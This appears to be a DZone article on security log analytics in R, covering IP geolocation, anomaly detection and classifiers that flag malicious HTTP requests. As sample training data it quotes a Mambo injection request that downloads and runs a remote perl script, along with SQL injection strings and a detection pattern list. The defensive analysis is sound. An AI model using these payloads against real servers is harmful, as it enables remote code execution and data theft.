Security Analytics, Bottom Up


A look at how data analytics, AI, and Big Data techniques can be applied to log data to strengthen your web security.


This article is intended for information security practitioners, developers, and architects working across application, infrastructure, and data protection. I am a security architect by profession and, more importantly, someone who has spent the last few years trying to bridge what I've learned about data analytics (from Coursera courses, data camps, and the like) with the information security world. The Refcardz I've come to use on DZone were one particular reason for writing this post, as I've tried to summarize a few matrices relevant to this "bridge."

One of the better ways to do this, I believe, is to begin with a simple source of truth: logs. Reactive as that may be, logs give us an important insight into what is statistically feasible with our data set, and the better we understand our own data, the more proactive we can be. To get to the topic faster, I will illustrate the thought process through a simple matrix.

| Security domain | Log source | Candidates for univariate analysis | Bi-variate analysis | Outlier detection/prediction |
| --- | --- | --- | --- | --- |
| Access management | HTTP access logs | 1. IP address, as a categorical variable. 2. Review of the traffic for a given period. 3. HTTP response codes, as a categorical variable. | 1. Finding anomalies by looking at bytes consumed or the duration of the response for a request. 2. A classification analysis between two or more categorical variables, such as between IP address and request strings, response times, etc. | 1. Predicting malicious traffic, based on patterns observed within requests. 2. Identifying rogue IPs, based on the frequency of requests against time ranges. |
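To make the univariate column a little more concrete, here is a minimal sketch (assuming the log sits at ./access.log and parses with readr's read_log, as in the code further down) that treats the HTTP response code as a categorical variable and simply counts its frequencies:

## minimal univariate sketch: frequency and proportion of HTTP response codes
library(readr)
access <- read_log("./access.log")
colnames(access) <- c('host','identity','userName','date','request','status','bytes','URL','agent','duration')

table(access$status)
prop.table(table(access$status))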

A similar representation can naturally be created for infrastructure logs, be it from firewalls, IDS/IPS, and so on. The intent here is to understand 'analytics' and statistical significance from the ground up before we reach for "top-down" tools in the marketplace. More often than not, commercial tools (such as SIEM or security analytics products) abstract away too much for us to comprehend what really happens from the bottom up.

If we are to replay the above matrix from a slightly different dimension, calling out statistical algorithms and their relevance to such an analysis, we'd get something like what I've given below. 

Univariate Analysis - Dissecting the IP Address 

## libraries used in this section
library(readr)         # read_log() to parse the access log
library(rgeolocate)    # maxmind() for IP geolocation
library(RColorBrewer)  # brewer.pal() for the plot palette
library(maps)          # world map data used by map_data()
library(ggplot2)       # ggplot() and map_data() for the world map

access <- read_log("./access.log")
colnames(access) <- c('host','identity','userName','date','request','status','bytes','URL','agent','duration')

## to start with, get a frequency count of requests by IP address
byIP <- table(access$host)
byIP <- as.data.frame(byIP)

## not the most aesthetic, but a basic frequency plot goes here
barplot(names.arg=byIP$Var1, height=byIP$Freq, col="skyblue")

## since the bar plot isn't readable enough, geolocate the IPs and plot them on a world map
## remember - for the rest of the code to work you need to have downloaded the MaxMind mmdb file onto your system into the respective directory
file <- system.file("extdata", "GeoLite2-City.mmdb", package = "rgeolocate")
set2 <- brewer.pal(8, "Set2")
world <- map_data('world')
world <- subset(world, region != "Antarctica")
## byIP$Var1 is a factor, so convert it to character before the lookup
results <- maxmind(as.character(byIP$Var1), file, c("continent_name", "country_code", "country_name", "city_name", "latitude", "longitude"))
g1 <- ggplot()
g1 <- g1 + geom_polygon(data=world, aes(long, lat, group=group), fill="white")
g1 <- g1 + geom_point(data=results, aes(x=longitude, y=latitude), color=set2[2], size=1, alpha=0.1)
g1 <- g1 + labs(x="", y="")
g1 <- g1 + theme(panel.background=element_rect(fill=alpha(set2[3],0.2), 
                                               colour='white'))
g1

## you can take this further by checking whether your IPs have a bad reputation
## just as before - the code below assumes you have a reputation feed downloaded from the likes of AlienVault
reputation <- "./reputation.data"
reputation.df <- read.csv(reputation, sep="#", header=FALSE)
colnames(reputation.df) <- c("IP", "Reliability", "Risk", "Type", "Country", "Locale", "Coords", "x")

## the IPs observed in our access log (as characters, not factors)
dest.ips <- as.character(byIP$Var1)

## distribution of the feed's reliability scores for our IPs, and the ones that look bad
table(reputation.df[reputation.df$IP %in% dest.ips, ]$Reliability)
badips <- as.character(reputation.df[(reputation.df$IP %in% dest.ips) & (reputation.df$Reliability > 3), ]$IP)
badips

That was a pretty simple start. If we now move into bi-variate analysis, the statistical significance grows a little further. As before, we will leverage libraries from the wider world - this time Twitter's AnomalyDetection package.

library("devtools")
devtools::install_github("twitter/AnomalyDetection")
library(Rcpp)
library(AnomalyDetection)
library(ggplot2)
library(sqldf)
## have your access logs loaded up - as shown in the earlier code block
df1 <- subset(access, select = c("date", "bytes"))
df2 <- subset(access, select = c("date", "duration"))

## to identify anomalies from a volume-of-bytes perspective
alB <- AnomalyDetectionVec(df1[[2]], period=7, longterm_period=30, plot=T)
alB

## to identify anomalies from a duration-of-transaction perspective
alD <- AnomalyDetectionVec(df2[[2]], period=7, longterm_period=30, plot=T)

## the requests flagged as anomalies in the bytes plot ...
df1[alB$anoms$index, ]

## ... and likewise for the duration data frame
df2[alD$anoms$index, ]
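One quick way to connect those anomaly indices back to the source data is to tabulate the hosts behind the anomalous rows - a small sketch (assuming the access data frame and alB from above) that edges towards the bi-variate view in the earlier matrix:

## which IPs are behind the anomalous byte counts?
sort(table(access$host[alB$anoms$index]), decreasing = TRUE)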

And finally, let's get into something a little more demanding of these statistical algorithms: let's see whether we can predict an outcome from the data, and whether an algorithm could learn particular security patterns from all the data we've got. We will go back to the matrix here for some clarity before we look at some sample code. Remember, the premise for the matrix below is the use case where we try to pick out malicious requests from an HTTP access log that could be riddled with the typical vulnerabilities around SQL injection, XSS, etc. The variables involved here naturally include the request string itself, which could be malicious, and are also determined by one or more of the following:

  • The host - a bad IP that's churning large and incoherent volumes of requests.

  • Date and time - not necessarily in sync with the operations performed on the request. 

  • Response bytes - potentially not in line with the typical output for a given request.

  • Duration, agent, etc. could also sometimes show anomalies, not just by themselves but in conjunction with one or more of the parameters above.

To start with, we introduce two variables to a typical log - one to qualify the log line as "training" or "test," and the other to flag it as "malicious" or not.

| qualifier | host | date | request | status | bytes | URL | agent | duration | malicious |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| train | 193.91.75.11 | [18/Aug/2006:13:23:13] | GET /index.php_REQUEST[option]=... | 200 | 167 | http://www.buttercupgames.com/... | Mozilla/5.0 | 746 | Y |

Once we've added those data points to the logs we already have, we can test some of the obvious algorithms for identifying what's potentially malicious and what's not.
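A minimal sketch of how the train and test data frames used below could be carved out of such a labelled log (the qualifier and malicious columns follow the table above; the split itself is an assumption on my part):

## split the labelled log on the 'qualifier' column
access$malicious <- as.factor(access$malicious)
train <- subset(access, qualifier == "train", select = -qualifier)
test  <- subset(access, qualifier == "test",  select = -qualifier)

## note: the test[,-10] index further below assumes 'malicious' sits in column 10;
## adjust the index (or use subset(test, select = -malicious)) to match your own column order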

Note - it wasn't easy crafting malicious requests that were still coherent with the rest of the dataset. I had to synthetically append such requests, based on examples from the links below, to get some relevant sample data:

https://www.sans.org/reading-room/whitepapers/securecode/sql-injection-modes-attack-defence-matters-23 

https://www.sans.org/reading-room/whitepapers/detection/identify-malicious-http-requests-34067 

Some specific attack patterns from - http://ossec-docs.readthedocs.io/en/latest/log_samples/apache/apache_attacks.html

That eventually meant I had a few malicious records in my log file that looked like the following (just the request string is pasted here):

GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.buttercupgames.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.buttercupgames.com/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0

You could run a simple URL decode to see that the request does malicious things - changing directory to /tmp, then downloading and executing a remote script - and comes from the Mambo attack samples above. We could also create patterns out of known SQL injection attack signatures called out in the SANS link above, such as the ones below (a small labelling sketch follows the list):

1 OR 1=1'

OR 1=1 --"

OR 1=1 --'

OR 1=1;1 ...
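As one hedged way to put such signatures to work - not necessarily how the labels in this post were produced - a few coarse patterns can be grepped against the request strings to propose candidate labels for review:

## coarse, illustrative signature patterns - by no means exhaustive
patterns <- c("or 1=1", "union select", "wget%20", ";rm%20-rf", "<script")

## flag any request matching at least one pattern (assumes the 'access' data frame from earlier)
hits <- Reduce(`|`, lapply(patterns, function(p) grepl(p, access$request, ignore.case = TRUE)))
access$malicious <- ifelse(hits, "Y", "N")

table(access$malicious)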

Note - remember, this obviously isn't the only way to run a prediction exercise. This is an attempt to understand what goes into the more common algorithms that support statistical analysis for use cases such as prediction. A few important lessons learned in this process include:

1. The world is full of categorical variables.

2. Statistical analysis on categorical variables requires far more comprehension of the 'subject' and the data than otherwise.

To elaborate a little more on the above points, let me try another matrix. There are two key assumptions behind the points below: one, the analysis for a malicious request stays pivoted on the request itself (with the updated request strings as above); two, and more importantly, the reader is expected to understand the concept of training and test datasets.

| Algorithm/approach | Typical challenges and workarounds |
| --- | --- |
| Logistic regression | The test data set cannot contain variables (factor levels) that are absent from the training data set. This naturally means that a request that is totally new in structure or construct may not be handled by a logistic regression if you end up with a bunch of categorical variables like the request string itself. |
| Naive Bayes | One of the more suitable alternatives: it can take a variety of categorical variables, converted into 'factors' (the default in languages like R), and it requires the output to be categorical, which suits us as well. |
| Neural network | A small challenge: as with regression above, the neural net library requires numeric variables. The outcome we're looking at may be a binary output here; as called out in the DZone Refcardz by Ricky Ho, it works on an iterative feedback mechanism where the output error is used to adjust the corresponding input weights. |
| K-nearest neighbors | The Euclidean distance function expects numeric input variables, and unless we can derive quantitative data out of our categorical variables (meaningfully), this doesn't look like an automatic fit. |
| Decision tree | There are many different algorithm choices here, and the best part is that it can take a variety of inputs - numeric, binary, or categorical. We can therefore hope for some success here. |
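To make the first row of that matrix concrete, here is a deliberately tiny, purely illustrative sketch of the unseen-level problem with a categorical predictor in a logistic regression (expect convergence warnings on such a small toy set):

## toy data: the request string as a categorical predictor of a binary outcome
train_df <- data.frame(
  request   = c("/index.php", "/index.php", "/cart.php", "/cart.php", "/index.php?id=1 OR 1=1"),
  malicious = c(0, 0, 0, 0, 1)
)
fit <- glm(malicious ~ request, data = train_df, family = binomial)

## a request string never seen during training
test_df <- data.frame(request = "/admin.php?id=1")

## this call fails with "factor request has new levels ..." - exactly the caveat in the table above
## predict(fit, newdata = test_df, type = "response")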

That said, let us close out this post with a few code snippets for the algorithms that are considerably friendlier towards categorical variables as we have them.

With Naive Bayes, the prediction naturally improves as the number of correlated variables increases. Without getting into specifics on the choice of variables, a representative snippet goes like this:

library(e1071)

## train on everything except the outcome; 'malicious' should be a factor
model <- naiveBayes(malicious~., data=train)

## predict on the test set, dropping the 'malicious' column (the 10th) before prediction
pred <- predict(model, test[,-10])

Now you could pivot the "malicious" column against just the "request" and/or the "host," etc. This is just a sample to show that the success rate naturally depends on the quality of the data itself and the extent to which the test data set is representative of the problem. The confusion matrix (showing the false positives) for the above snippet goes like this:

> table(pred, test$malicious)    
pred  N  Y
   N 37  0
   Y  6  4

Of course, that's a small data set, where 6 of the 47 records were misclassified.

With Decision trees, the snippet goes like this: 

library(rpart)

## grow a deliberately fine-grained tree on the request and host variables
treemodel <- rpart(malicious~request+host, data=train, control=rpart.control(minsplit=2, minbucket=1, cp=0.001))

## plot the tree before annotating it with text()
plot(treemodel, uniform=TRUE)
text(treemodel, use.n=T)

predTree <- predict(treemodel, newdata=test, type='class')
table(predTree, test$malicious)

And the results improve for the same data set: the false positives disappear, though we now miss two of the malicious requests.

> table(predTree, test$malicious)        
predTree  N  Y
       N 43  2
       Y  0  2
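As a quick follow-up (assuming pred and predTree from the snippets above), the overall misclassification counts can be pulled straight from the predictions rather than read off the matrices:

## overall misclassification counts on the same test set
sum(pred != test$malicious)       # Naive Bayes: 6 of 47 in the run above
sum(predTree != test$malicious)   # decision tree: 2 of 47 in the run above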

Summary

While the importance of subject knowledge behind the data can never be overemphasized, this article has tried to throw a little more light on the world of statistics, bottom up as titled: understanding the algorithm choices for a typical real-world dataset (an HTTP log, for example), as well as the kinds of analysis that can be performed on it (univariate, bi-variate, and so on). I hope this helps you get a jump start into the world of analytics, with a little more insight into how it can be relevant for your data.


Topics:
log analytics, information security, application security, data security, security

Opinions expressed by DZone contributors are their own.
